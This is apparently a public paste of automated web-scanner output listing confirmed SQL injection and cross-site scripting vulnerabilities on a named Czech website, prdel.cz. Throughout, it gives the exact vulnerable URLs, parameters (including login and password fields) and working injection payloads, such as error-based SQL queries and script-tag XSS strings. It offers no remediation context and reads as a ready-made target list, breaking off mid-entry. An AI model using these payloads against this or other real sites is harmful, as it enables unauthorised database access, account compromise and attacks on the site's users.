sroub3k

prdel.cz

Apr 6th, 2013
  1. ||| SQL Injection
  2.  
  3. Severity: Critical
  4. Confirmation: Confirmed
  5. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  6. URL: http://www.prdel.cz/rubrika.php?rub='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  7. Parameter Name: rub
  8. Parameter Type: Querystring
  9. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  10.  
  11. Severity: Critical
  12. Confirmation: Confirmed
  13. URL: http://www.prdel.cz/clanek.php?id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  14. Parameter Name: id
  15. Parameter Type: Querystring
  16. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  17.  
  18. Severity: Critical
  19. Confirmation: Confirmed
  20. URL: http://www.prdel.cz/kom_info.php?id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  21. Parameter Name: id
  22. Parameter Type: Querystring
  23. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  24.  
  25. Severity: Critical
  26. Confirmation: Confirmed
  27. URL: http://www.prdel.cz/prispevky.php?id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  28. Parameter Name: id
  29. Parameter Type: Querystring
  30. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  31.  
  32. Severity: Critical
  33. Confirmation: Confirmed
  34. URL: http://www.prdel.cz/rubrika.php?s=18&rub='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  35. Parameter Name: rub
  36. Parameter Type: Querystring
  37. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  38.  
  39. Severity: Critical
  40. Confirmation: Confirmed
  41. URL: http://www.prdel.cz/horoskop.php?h=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  42. Parameter Name: h
  43. Parameter Type: Querystring
  44. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  45.  
  46. Severity: Critical
  47. Confirmation: Confirmed
  48. URL: http://www.prdel.cz/kom_info.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&vypsat=1
  49. Parameter Name: id
  50. Parameter Type: Querystring
  51. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  52.  
  53. Severity: Critical
  54. Confirmation: Confirmed
  55. URL: http://www.prdel.cz/prispevky.php?s=20&id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  56. Parameter Name: id
  57. Parameter Type: Querystring
  58. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  59.  
  60. Severity: Critical
  61. Confirmation: Confirmed
  62. URL: http://www.prdel.cz/clanek.php?id=122
  63. Parameter Name: id
  64. Parameter Type: Post
  65. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  66.  
  67. Severity: Critical
  68. Confirmation: Confirmed
  69. URL: http://www.prdel.cz/prispevky.php?id=168
  70. Parameter Name: id
  71. Parameter Type: Post
  72. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  73.  
  74. Severity: Critical
  75. Confirmation: Confirmed
  76. URL: http://www.prdel.cz/prispevky.php?id=168
  77. Parameter Name: jmeno
  78. Parameter Type: Post
  79. Attack Pattern: ' and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='
  80.  
  81. ||| Boolean Based SQL Injection
  82.  
  83. Severity: Critical
  84. Confirmation: Confirmed
  85. URL: http://www.prdel.cz/index_vypis.php?id=-1 OR 17-7=10
  86. Parameter Name: id
  87. Parameter Type: Querystring
  88. Attack Pattern: -1 OR 17-7=10
  89.  
  90. ||| [High Possibility] SQL Injection
  91.  
  92. Severity: Critical
  93. Confirmation: Confirmed
  94. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  95. URL: http://www.prdel.cz/rubrika.php?rub='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  96. Parameter Name: rub
  97. Parameter Type: Querystring
  98. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  99.  
  100. Severity: Critical
  101. Confirmation: Confirmed
  102. URL: http://www.prdel.cz/clanek.php?id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  103. Parameter Name: id
  104. Parameter Type: Querystring
  105. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  106.  
  107. Severity: Critical
  108. Confirmation: Confirmed
  109. URL: http://www.prdel.cz/kom_info.php?id=%27
  110. Parameter Name: id
  111. Parameter Type: Querystring
  112. Attack Pattern: %27
  113.  
  114. Severity: Critical
  115. Confirmation: Confirmed
  116. URL: http://www.prdel.cz/kom_info.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  117. Parameter Name: id
  118. Parameter Type: Querystring
  119. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  120.  
  121. Severity: Critical
  122. Confirmation: Confirmed
  123. URL: http://www.prdel.cz/prispevky.php?id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  124. Parameter Name: id
  125. Parameter Type: Querystring
  126. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  127.  
  128. Severity: Critical
  129. Confirmation: Confirmed
  130. URL: http://www.prdel.cz/clanek.php?id=122
  131. Parameter Name: heslo
  132. Parameter Type: Post
  133. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  134.  
  135. Severity: Critical
  136. Confirmation: Confirmed
  137. URL: http://www.prdel.cz/rubrika.php?s=18&rub='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  138. Parameter Name: rub
  139. Parameter Type: Querystring
  140. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  141.  
  142. Severity: Critical
  143. Confirmation: Confirmed
  144. URL: http://www.prdel.cz/clanek.php?id=122
  145. Parameter Name: id
  146. Parameter Type: Post
  147. Attack Pattern: '+NSFTW+'
  148.  
  149. Severity: Critical
  150. Confirmation: Confirmed
  151. URL: http://www.prdel.cz/clanek.php?id=122
  152. Parameter Name: jmeno
  153. Parameter Type: Post
  154. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  155.  
  156. Severity : Critical
  157. Confirmation: Confirmed
  158. URL: http://www.prdel.cz/clanek.php?id=122
  159. Parameter Name: jmeno
  160. Parameter Type: Post
  161. Attack Pattern: '+NSFTW+'
  162.  
  163. Severity: Critical
  164. Confirmation: Confirmed
  165. URL: http://www.prdel.cz/horoskop.php?h=%27
  166. Parameter Name: h
  167. Parameter Type: Querystring
  168. Attack Pattern: %27
  169.  
  170. Severity: Critical
  171. Confirmation: Confirmed
  172. URL: http://www.prdel.cz/kom_info.php?id=%27&vypsat=1
  173. Parameter Name: id
  174. Parameter Type: Querystring
  175. Attack Pattern: %27
  176.  
  177. Severity: Critical
  178. Confirmation: Confirmed
  179. URL: http://www.prdel.cz/prispevky.php?s=20&id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  180. Parameter Name: id
  181. Parameter Type: Querystring
  182. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  183.  
  184. Severity: Critical
  185. Confirmation: Confirmed
  186. URL: http://www.prdel.cz/clanek.php?id=122
  187. Parameter Name: id
  188. Parameter Type: Post
  189. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  190.  
  191. Severity: Critical
  192. Confirmation: Confirmed
  193. URL: http://www.prdel.cz/prispevky.php?id='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
  194. Parameter Name: id
  195. Parameter Type: Querystring
  196. Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
  197.  
  198. Severity: Critical
  199. Confirmation: Confirmed
  200. URL: http://www.prdel.cz/prispevky.php?id=168
  201. Parameter Name: jmeno
  202. Parameter Type: Post
  203. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  204.  
  205. Severity: Critical
  206. Confirmation: Confirmed
  207. URL: http://www.prdel.cz/prispevky.php?id=168
  208. Parameter Name: jmeno
  209. Parameter Type: Post
  210. Attack Pattern: '+NSFTW+'
  211.  
  212. Severity: Critical
  213. Confirmation: Confirmed
  214. URL: http://www.prdel.cz/prispevky.php?id=168
  215. Parameter Name: heslo
  216. Parameter Type: Post
  217. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  218.  
  219. Severity: Critical
  220. Confirmation: Confirmed
  221. URL: http://www.prdel.cz/prispevky.php?id=168
  222. Parameter Name: heslo
  223. Parameter Type: Post
  224. Attack Pattern: '+NSFTW+'
  225.  
  226. Severity: Critical
  227. Confirmation: Confirmed
  228. URL: http://www.prdel.cz/reg_edit.php
  229. Parameter Name: login
  230. Parameter Type: Post
  231. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  232.  
  233. Severity: Critical
  234. Confirmation: Confirmed
  235. URL: http://www.prdel.cz/reg_edit.php
  236. Parameter Name: sheslo
  237. Parameter Type: Post
  238. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  239.  
  240. Severity: Critical
  241. Confirmation: Confirmed
  242. URL: http://www.prdel.cz/reg_edit.php
  243. Parameter Name: sheslo
  244. Parameter Type: Post
  245. Attack Pattern: '+NSFTW+'
  246.  
  247. Severity: Critical
  248. Confirmation: Confirmed
  249. URL: http://www.prdel.cz/reg_zapom.php
  250. Parameter Name: login
  251. Parameter Type: Post
  252. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  253.  
  254. Severity: Critical
  255. Confirmation: Confirmed
  256. URL: http://www.prdel.cz/kom_info.php?s=20&id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&vypsat=3
  257. Parameter Name: id
  258. Parameter Type: Querystring
  259. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  260.  
  261. Severity: Critical
  262. Confirmation: Confirmed
  263. URL: http://www.prdel.cz/prispevky.php?id=168
  264. Parameter Name: id
  265. Parameter Type: Post
  266. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  267.  
  268. Severity: Critical
  269. Confirmation: Confirmed
  270. URL: http://www.prdel.cz/prispevky.php?id=168
  271. Parameter Name: id
  272. Parameter Type: Post
  273. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  274.  
  275. Severity: Critical
  276. Confirmation: Confirmed
  277. URL: http://www.prdel.cz/prispevky.php?id=168
  278. Parameter Name: id
  279. Parameter Type: Post
  280. Attack Pattern: '+NSFTW+'
  281.  
  282. ||| XSS (Cross-site Scripting)
  283.  
  284. Severity: Important
  285. Confirmation: Confirmed
  286. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  287. URL: http://www.prdel.cz/rubrika.php?rub='"--></style></script><script>alert(0x000090)</script>
  288. Parameter Name: rub
  289. Parameter Type: Querystring
  290. Attack Pattern: '"--></style></script><script>alert(0x000090)</script>
  291.  
  292. Severity: Important
  293. Confirmation: Confirmed
  294. URL: http://www.prdel.cz/clanek.php?id=122'"--></style></script><script>alert(0x0000B1)</script>
  295. Parameter Name: id
  296. Parameter Type: Querystring
  297. Attack Pattern: 122'"--></style></script><script>alert(0x0000B1)</script>
  298.  
  299. Severity: Important
  300. Confirmation: Confirmed
  301. URL: http://www.prdel.cz/kom_info.php?id='"--></style></script><script>alert(0x00013C)</script>
  302. Parameter Name: id
  303. Parameter Type: Querystring
  304. Attack Pattern: '"--></style></script><script>alert(0x00013C)</script>
  305.  
  306. Severity: Important
  307. Confirmation: Confirmed
  308. URL: http://www.prdel.cz/prispevky.php?id='"--></style></script><script>alert(0x000177)</script>
  309. Parameter Name: id
  310. Parameter Type: Querystring
  311. Attack Pattern: '"--></style></script><script>alert(0x000177)</script>
  312.  
  313. Severity: Important
  314. Confirmation: Confirmed
  315. URL: http://www.prdel.cz/clanek.php?id=122
  316. Parameter Name: heslo
  317. Parameter Type: Post
  318. Attack Pattern: '"--></style></script><script>alert(0x000231)</script>
  319.  
  320. Severity: Important
  321. Confirmation: Confirmed
  322. URL: http://www.prdel.cz/clanek.php?id=122
  323. Parameter Name: id
  324. Parameter Type: Post
  325. Attack Pattern: 122'"--></style></script><script>alert(0x000236)</script>
  326.  
  327. Severity: Important
  328. Confirmation: Confirmed
  329. URL: http://www.prdel.cz/rubrika.php?s=18&rub='"--></style></script><script>alert(0x00024D)</script>
  330. Parameter Name: rub
  331. Parameter Type: Querystring
  332. Attack Pattern: '"--></style></script><script>alert(0x00024D)</script>
  333.  
  334. Severity: Important
  335. Confirmation: Confirmed
  336. URL: http://www.prdel.cz/registrace.php
  337. Parameter Name: id
  338. Parameter Type: Post
  339. Attack Pattern: '"--></style></script><script>alert(0x00028D)</script>
  340.  
  341. Severity: Important
  342. Confirmation: Confirmed
  343. URL: http://www.prdel.cz/registrace.php
  344. Parameter Name: login
  345. Parameter Type: Post
  346. Attack Pattern: '"--></style></script><script>alert(0x00028E)</script>
  347.  
  348. Severity: Important
  349. Confirmation: Confirmed
  350. URL: http://www.prdel.cz/registrace.php
  351. Parameter Name: mail
  352. Parameter Type: Post
  353. Attack Pattern: '"--></style></script><script>alert(0x00028F)</script>
  354.  
  355. Severity: Important
  356. Confirmation: Confirmed
  357. URL: http://www.prdel.cz/centrum.php
  358. Parameter Name: centrum
  359. Parameter Type: Post
  360. Attack Pattern: '"--></style></script><script>alert(0x0002B1)</script>
  361.  
  362. Severity: Important
  363. Confirmation: Confirmed
  364. URL: http://www.prdel.cz/centrum.php
  365. Parameter Name: centrum
  366. Parameter Type: Post
  367. Attack Pattern: '"--></style></script><script>alert(0x0002F7)</script>
  368.  
  369. Severity: Important
  370. Confirmation: Confirmed
  371. URL: http://www.prdel.cz/registrace.php
  372. Parameter Name: login
  373. Parameter Type: Post
  374. Attack Pattern: '"--></style></script><script>alert(0x00031D)</script>
  375.  
  376. Severity: Important
  377. Confirmation: Confirmed
  378. URL: http://www.prdel.cz/registrace.php
  379. Parameter Name: mail
  380. Parameter Type: Post
  381. Attack Pattern: '"--></style></script><script>alert(0x00033C)</script>
  382.  
  383. Severity: Important
  384. Confirmation: Confirmed
  385. URL: http://www.prdel.cz/clanek.php?id=122
  386. Parameter Name: text
  387. Parameter Type: Post
  388. Attack Pattern: '"--></style></script><script>alert(0x000312)</script>
  389.  
  390. Severity: Important
  391. Confirmation: Confirmed
  392. URL: http://www.prdel.cz/clanek.php?id=122
  393. Parameter Name: jmeno
  394. Parameter Type: Post
  395. Attack Pattern: '"--></style></script><script>alert(0x000351)</script>
  396.  
  397. Severity: Important
  398. Confirmation: Confirmed
  399. URL: http://www.prdel.cz/clanek.php?id=122
  400. Parameter Name: heslo
  401. Parameter Type: Post
  402. Attack Pattern: '"--></style></script><script>alert(0x000352)</script>
  403.  
  404. Severity: Important
  405. Confirmation: Confirmed
  406. URL: http://www.prdel.cz/clanek.php?id=122
  407. Parameter Name: mail
  408. Parameter Type: Post
  409. Attack Pattern: '"--></style></script><script>alert(0x000353)</script>
  410.  
  411. Severity: Important
  412. Confirmation: Confirmed
  413. URL: http://www.prdel.cz/clanek.php?id=122
  414. Parameter Name: vec
  415. Parameter Type: Post
  416. Attack Pattern: '"--></style></script><script>alert(0x000356)</script>
  417.  
  418. Severity: Important
  419. Confirmation: Confirmed
  420. URL: http://www.prdel.cz/ankety.php?s=15&rub='"--></style></script><script>alert(0x000379)</script>
  421. Parameter Name: rub
  422. Parameter Type: Querystring
  423. Attack Pattern: '"--></style></script><script>alert(0x000379)</script>
  424.  
  425. Severity: Important
  426. Confirmation: Confirmed
  427. URL: http://www.prdel.cz/horoskop.php?h='"--></style></script><script>alert(0x000380)</script>
  428. Parameter Name: h
  429. Parameter Type: Querystring
  430. Attack Pattern: '"--></style></script><script>alert(0x000380)</script>
  431.  
  432. Severity: Important
  433. Confirmation: Confirmed
  434. URL: http://www.prdel.cz/kom_info.php?id='"--></style></script><script>alert(0x0003E5)</script>&vypsat=1
  435. Parameter Name: id
  436. Parameter Type: Querystring
  437. Attack Pattern: '"--></style></script><script>alert(0x0003E5)</script>
  438.  
  439. Severity: Important
  440. Confirmation: Confirmed
  441. URL: http://www.prdel.cz/prispevky.php?s=20&id='"--></style></script><script>alert(0x000400)</script>
  442. Parameter Name: id
  443. Parameter Type: Querystring
  444. Attack Pattern: '"--></style></script><script>alert(0x000400)</script>
  445.  
  446. Severity: Important
  447. Confirmation: Confirmed
  448. URL: http://www.prdel.cz/clanek.php?id=122
  449. Parameter Name: text
  450. Parameter Type: Post
  451. Attack Pattern: '"><net sparker=alert(0x00037F)>
  452.  
  453. Severity: Important
  454. Confirmation: Confirmed
  455. URL: http://www.prdel.cz/prispevky.php?id=168
  456. Parameter Name: jmeno
  457. Parameter Type: Post
  458. Attack Pattern: '"--></style></script><script>alert(0x000439)</script>
  459.  
  460. Severity: Important
  461. Confirmation: Confirmed
  462. URL: http://www.prdel.cz/prispevky.php?id=168
  463. Parameter Name: heslo
  464. Parameter Type: Post
  465. Attack Pattern: '"--></style></script><script>alert(0x00041E)</script>
  466.  
  467. Severity: Important
  468. Confirmation : Confirmed
  469. URL: http://www.prdel.cz/prispevky.php?id=168
  470. Parameter Name: heslo
  471. Parameter Type: Post
  472. Attack Pattern: '"--></style></script><script>alert(0x00043A)</script>
  473.  
  474. Severity: Important
  475. Confirmation: Confirmed
  476. URL: http://www.prdel.cz/prispevky.php?id=168
  477. Parameter Name: mail
  478. Parameter Type: Post
  479. Attack Pattern: '"--></style></script><script>alert(0x00043B)</script>
  480.  
  481. Severity: Important
  482. Confirmation: Confirmed
  483. URL: http://www.prdel.cz/prispevky.php?id=168
  484. Parameter Name: vec
  485. Parameter Type: Post
  486. Attack Pattern: '"--></style></script><script>alert(0x00043C)</script>
  487.  
  488. Severity: Important
  489. Confirmation: Confirmed
  490. URL: http://www.prdel.cz/prispevky.php?id=168
  491. Parameter Name: id
  492. Parameter Type: Post
  493. Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
  494.  
  495. Severity: Important
  496. Confirmation: Confirmed
  497. URL: http://www.prdel.cz/prispevky.php?id=168
  498. Parameter Name: jmeno
  499. Parameter Type: Post
  500. Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
  501.  
  502. Severity: Important
  503. Confirmation: Confirmed
  504. URL: http://www.prdel.cz/reg_edit.php
  505. Parameter Name: login
  506. Parameter Type: Post
  507. Attack Pattern: '"--></style></script><script>alert(0x0004AA)</script>
  508.  
  509. Severity: Important
  510. Confirmation: Confirmed
  511. URL: http://www.prdel.cz/reg_edit.php
  512. Parameter Name: mail
  513. Parameter Type: Post
  514. Attack Pattern: '"--></style></script><script>alert(0x0004AB)</script>
  515.  
  516. Severity: Important
  517. Confirmation: Confirmed
  518. URL: http://www.prdel.cz/reg_edit.php
  519. Parameter Name: sheslo
  520. Parameter Type: Post
  521. Attack Pattern: '"--></style></script><script>alert(0x0004CC)</script>
  522.  
  523. Severity: Important
  524. Confirmation: Confirmed
  525. URL: http://www.prdel.cz/reg_zapom.php
  526. Parameter Name: login
  527. Parameter Type: Post
  528. Attack Pattern: '"--></style></script><script>alert(0x0004DC)</script>
  529.  
  530. Severity: Important
  531. Confirmation: Confirmed
  532. URL: http://www.prdel.cz/kom_info.php?s=20&id='"--></style></script><script>alert(0x00052D)</script>&vypsat=3
  533. Parameter Name: id
  534. Parameter Type: Querystring
  535. Attack Pattern: '"--></style></script><script>alert(0x00052D)</script>
  536.  
  537. Severity: Important
  538. Confirmation: Confirmed
  539. URL: http://www.prdel.cz/kom_info.php?s=20&id=2&vypsat=3'"--></style></script><script>alert(0x000530)</script>
  540. Parameter Name: vypsat
  541. Parameter Type: Querystring
  542. Attack Pattern: 3'"--></style></script><script>alert(0x000530)</script>
  543.  
  544. Severity: Important
  545. Confirmation: Confirmed
  546. URL: http://www.prdel.cz/prispevky.php?id=168
  547. Parameter Name: text
  548. Parameter Type: Post
  549. Attack Pattern: '"--></style></script><script>alert(0x0004D8)</script>
  550.  
  551. ||| [Possible] Cross-site Scripting
  552.  
  553. Severity : Medium
  554. Confirmation: Confirmed
  555. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  556.  
  557. URL: http://www.prdel.cz/clanek.php?id='"--></style></script><script>alert(0x00009C)</script>
  558.  
  559. Notes: This page responds with an HTTP redirect status, so the detected XSS vulnerability might not be exploitable
  560. in many conditions; however, it still indicates a lack of correct output filtering and should be addressed.
  561.  
  562. Parameter Name: id
  563. Parameter Type: Querystring
  564. Attack Pattern: '"--></style></script><script>netsparker(0x00009C)</script>
  565.  
  566. Severity : Medium
  567. Confirmation: Confirmed
  568. URL: http://www.prdel.cz/clanek.php?id='"--></style></script><script>alert(0x000201)</script>
  569. Parameter Name: id
  570. Parameter Type: Querystring
  571. Attack Pattern: '"--></style></script><script>netsparker(0x000201)</script>
  572.  
  573. Severity : Medium
  574. Confirmation : Confirmed
